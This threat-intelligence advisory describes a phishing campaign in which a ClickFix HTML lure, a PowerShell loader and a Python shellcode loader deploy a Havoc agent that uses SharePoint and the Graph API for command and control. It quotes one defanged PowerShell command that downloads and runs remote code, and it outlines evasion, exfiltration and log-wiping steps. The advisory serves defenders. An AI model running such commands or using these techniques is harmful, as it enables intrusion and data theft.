Fortinet’s FortiGuard Labs has identified a new attack campaign leveraging Havoc, an open-source post-exploitation framework, to create a fully undetectable (FUD) Command and Control (C2) system using Microsoft SharePoint and the Microsoft Graph API. The threat actor uses SharePoint as a hosting platform for payloads, while the Graph API helps obscure malicious C2 communications within legitimate Microsoft services.
Severity Level: High
Threat Overview
1. Initial Access – Phishing Email
Delivery Method:
- Attack begins with a phishing email containing an HTML attachment named Documents.html.
- Uses ClickFix social engineering tactics to trick users into executing a malicious PowerShell command.
Execution Trigger:
- Victim opens the HTML file, which displays a fake error message instructing them to copy & paste a PowerShell command.
- Example of the PowerShell payload: powershell -w h -c “iwr hxxps://hao771[.]sharepoint.com/…|iex”
- This command downloads & executes a remote PowerShell script hosted on SharePoint.
2. Execution – PowerShell Loader
- PowerShell Execution Steps: Decodes Base64 payload embedded in the HTML file, Downloads an additional PowerShell script from SharePoint, Runs in hidden mode to avoid detection, and Deletes registry entries under HKCU:\Software\Microsoft as an infection marker.
3. Secondary Payload – Python Shellcode Loader
Python-based execution steps:
- Checks for Python installation (pythonw.exe); if not found, it downloads it.
- Executes a Python script (payload_20250107_015913.py) in hidden mode.
- The script acts as a shellcode loader, executing malicious payloads in memory.
Russian Debugging Strings Found:
- o Выделение памяти (Memory allocation), Запись в память (Write to memory), and Выполнение shellcode (Execution of shellcode). This suggests potential links to Russian-speaking threat actors.
4. C2 Communication – Microsoft Graph API
- The modified Havoc Demon DLL is executed, using Microsoft Graph API to communicate with SharePoint-based C2 servers.
- Hardcoded credentials are used to generate OAuth 2.0 tokens for API authentication.
- The malware creates two files in SharePoint for C2 data exchange:
– {VictimID}pD9-tKout → C2 Commands (Sent from attacker)
– {VictimID}pD9-tKin → Response from infected system - Once C2 is established, the commads include gathering information about the target, file operations, command and payload execution, token manipulation, and Kerberos Attacks.
- Stealth Factor: Since all traffic is encrypted and disguised as legitimate Microsoft Graph API activity, it bypasses many security tools.
5. Data Exfiltration:
- Stolen credentials, system logs, and sensitive files are uploaded to SharePoint C2 servers using Microsoft Graph API PUT requests.
Covering Tracks:
- The malware deletes logs & temporary files to erase forensic evidence.
- C2 files {VictimID}pD9-tKout and {VictimID}pD9-tKin are removed after execution.
Recommendations
- Implement email filtering for suspicious HTML attachments.
- Disable or restrict PowerShell execution for non-administrative users.
- Use PowerShell Constrained Language Mode and Script Block Logging (Log ID 4104).
- Monitor Python script execution (python.exe, pythonw.exe) in sensitive environments.
- Restrict Microsoft Graph API access where not needed.
- Restrict API access to approved applications only.
- Use role-based access control (RBAC) to limit SharePoint and Graph API permissions.
- Keep Windows & Microsoft 365 Updated.
- Enforce OAuth 2.0 and disable outdated authentication methods (e.g., Basic Auth, NTLM).
- User Awareness: Train employees on phishing email detection and social engineering tactics. Warn against copying and pasting PowerShell commands from emails.
- Block the IOCs at their respective controls.
https://www.virustotal.com/gui/collection/9a99d459b54bbbd9a6dc5ebb130c7159ce017929164a797ceee650dbcb52061d/iocs
Source:
- https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2
Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn.
No related posts found.